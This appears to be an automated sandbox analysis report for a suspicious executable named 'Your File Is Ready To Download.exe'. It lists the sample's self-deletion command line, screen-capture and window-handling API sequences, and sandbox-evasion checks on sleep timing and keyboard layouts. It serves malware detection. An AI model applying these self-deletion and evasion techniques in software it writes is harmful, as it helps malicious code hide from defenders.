Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeFile created: \your file is ready to download.exe
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeFile created: \your file is ready to download.exeJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeFile created: \your file is ready to download.exeJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeFile created: \your file is ready to download.exeJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Self deletion via cmd deleteShow sources
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeProcess created: C:\Windows\system32\cmd.exe /c del "C:\Users\user\Desktop\Your File Is Ready To Download.exe"
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeProcess created: C:\Windows\system32\cmd.exe /c del "C:\Users\user\Desktop\Your File Is Ready To Download.exe"Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140050076 IsZoomed,IsIconic,1_2_0000000140050076
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140058660 GetCursorPos,GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,WindowFromPoint,EnumChildWindows,GetClassNameW,EnumChildWindows,malloc,1_2_0000000140058660
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140054730 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetSystemMetrics,GetSystemMetrics,wcsncpy,GetDC,DestroyIcon,DeleteObject,GetIconInfo,CreateCompatibleDC,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,CreateCompatibleDC,malloc,ReleaseDC,DeleteObject,SelectObject,DeleteDC,DeleteObject,malloc,1_2_0000000140054730
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140096770 SetWindowTextW,IsZoomed,IsIconic,ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowLongW,GetWindowRect,GetClientRect,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,SetFocus,1_2_0000000140096770
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140096770 SetWindowTextW,IsZoomed,IsIconic,ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowLongW,GetWindowRect,GetClientRect,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,SetFocus,1_2_0000000140096770
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014009085D GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,1_2_000000014009085D
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014009086D MulDiv,GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,1_2_000000014009086D
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140090865 GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,1_2_0000000140090865
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014009087B MulDiv,GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,1_2_000000014009087B
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014009689B ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,1_2_000000014009689B
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140096891 ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,1_2_0000000140096891
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400908BF MulDiv,GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,1_2_00000001400908BF
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400448D0 IsWindow,DestroyWindow,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetDesktopWindow,GetWindowRect,GetCursorPos,GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,IsWindow,CreateWindowExW,SendMessageW,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetWindowRect,SendMessageW,SendMessageW,1_2_00000001400448D0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400968C6 ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,1_2_00000001400968C6
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400968F8 ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,1_2_00000001400968F8
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400908F7 GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,1_2_00000001400908F7
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140090906 GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,1_2_0000000140090906
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014009694A ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,1_2_000000014009694A
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014009699C ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,1_2_000000014009699C
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400569B0 SendMessageW,IsWindowVisible,ShowWindow,IsIconic,ShowWindow,GetForegroundWindow,SetForegroundWindow,SendMessageW,1_2_00000001400569B0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400929C0 GetWindowLongW,GetWindowLongW,SetWindowPos,EnableWindow,GetWindowRect,GetClientRect,MulDiv,MulDiv,GetWindowRect,GetClientRect,MulDiv,MulDiv,_wcstoi64,IsWindow,SetParent,SetWindowLongPtrW,SetParent,IsWindowVisible,IsIconic,SetWindowLongW,SetWindowLongW,SetWindowPos,InvalidateRect,1_2_00000001400929C0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400969C7 MulDiv,MulDiv,ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,1_2_00000001400969C7
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014008EA20 SendMessageW,MulDiv,MulDiv,COMRefPtr,MulDiv,GetDC,SelectObject,GetTextMetricsW,MulDiv,GetDC,SelectObject,GetTextMetricsW,GetSystemMetrics,GetDC,SelectObject,GetTextMetricsW,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,DrawTextW,DrawTextW,GetCharABCWidthsW,MulDiv,GetSystemMetrics,GetSystemMetrics,MulDiv,GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,SelectObject,ReleaseDC,SendMessageW,SendMessageW,GetClientRect,SetWindowLongW,SendMessageW,SetWindowLongW,MoveWindow,GetWindowRect,SendMessageW,GetWindowRect,MapWindowPoints,InvalidateRect,SetWindowPos,SetWindowPos,MapWindowPoints,1_2_000000014008EA20
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400B0AF0 GetForegroundWindow,IsWindowVisible,IsIconic,ShowWindow,1_2_00000001400B0AF0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014009CC50 SendMessageW,GetWindowLongW,IsWindowVisible,IsIconic,GetFocus,GetWindowRect,GetPropW,ShowWindow,GetUpdateRect,SendMessageW,GetWindowLongW,ShowWindow,EnableWindow,GetWindowRect,PtInRect,PtInRect,SetFocus,SendMessageW,ShowWindow,SetFocus,InvalidateRect,MapWindowPoints,InvalidateRect,1_2_000000014009CC50
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400B0CD0 GetWindowThreadProcessId,GetForegroundWindow,IsIconic,ShowWindow,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,BringWindowToTop,1_2_00000001400B0CD0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140068FF0 GetTickCount,GetForegroundWindow,GetTickCount,GetWindowThreadProcessId,GetGUIThreadInfo,ClientToScreen,GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,_itow,1_2_0000000140068FF0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400531B0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,CreateCompatibleDC,malloc,ReleaseDC,SelectObject,DeleteDC,DeleteObject,malloc,GetPixel,ReleaseDC,malloc,malloc,1_2_00000001400531B0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modificationsShow sources
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140018A201_2_0000000140018A20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6984Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140058D70 GetLocalTime followed by cmp: cmp word ptr [rbx], cx and CTI: je 00000001400590A3h1_2_0000000140058D70
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140058D70 GetLocalTime followed by cmp: cmp dx, ax and CTI: je 0000000140058F63h1_2_0000000140058D70
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140014BA0 GetKeyboardLayout followed by cmp: cmp ecx, 0ah and CTI: jl 0000000140014F02h country: Spanish (es)1_2_0000000140014BA0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014001A400 GetKeyboardLayout followed by cmp: cmp dl, 00000019h and CTI: ja 000000014001A57Dh country: Russian (ru)1_2_000000014001A400
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400226B7 GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 00000001400228E9h country: Urdu (ur)1_2_00000001400226B7
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400226B7 GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 00000001400228E9h country: Inuktitut (iu)1_2_00000001400226B7
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400226BF GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 00000001400228E9h country: Urdu (ur)1_2_00000001400226BF
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400226BF GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 00000001400228E9h country: Inuktitut (iu)1_2_00000001400226BF
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400226C6 GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 00000001400228E9h country: Urdu (ur)1_2_00000001400226C6
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400226C6 GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 00000001400228E9h country: Inuktitut (iu)1_2_00000001400226C6
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400226ED GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 00000001400228E9h country: Urdu (ur)1_2_00000001400226ED
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400226ED GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 00000001400228E9h country: Inuktitut (iu)1_2_00000001400226ED
